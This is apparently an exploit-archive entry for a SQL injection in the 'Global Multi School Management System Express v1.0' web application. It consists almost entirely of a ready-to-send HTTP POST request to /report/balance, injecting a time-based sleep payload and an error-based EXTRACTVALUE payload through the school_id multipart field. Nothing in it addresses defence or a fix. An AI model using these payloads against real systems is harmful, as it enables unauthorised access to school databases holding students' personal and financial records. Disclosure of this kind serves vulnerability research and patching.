# Exploit Title:  Global - Multi School Management System Express v1.0- SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/global-multi-school-management-system-express/21975378
# Tested on: Kali Linux & MacOS
# CVE: N/A

### Request ###
POST /report/balance HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: http://localhost
Cookie: gmsms=b8d36491f08934ac621b6bc7170eaef18290469f
Content-Length: 472
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="school_id"
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="academic_year_id"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="group_by"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="date_from"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="date_to"

------------YWJkMTQzNDcw--

### Parameter & Payloads ###
Parameter: MULTIPART school_id ((custom) POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY
clause (EXTRACTVALUE)
Payload: ------------YWJkMTQzNDcw
Content-Disposition: form-data; name="school_id"
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z' AND
EXTRACTVALUE(1586,CONCAT(0x5c,0x71766b6b71,(SELECT
(ELT(1586=1586,1))),0x716a627071)) AND 'Dyjx'='Dyjx
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="academic_year_id"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="group_by"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="date_from"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="date_to"

------------YWJkMTQzNDcw–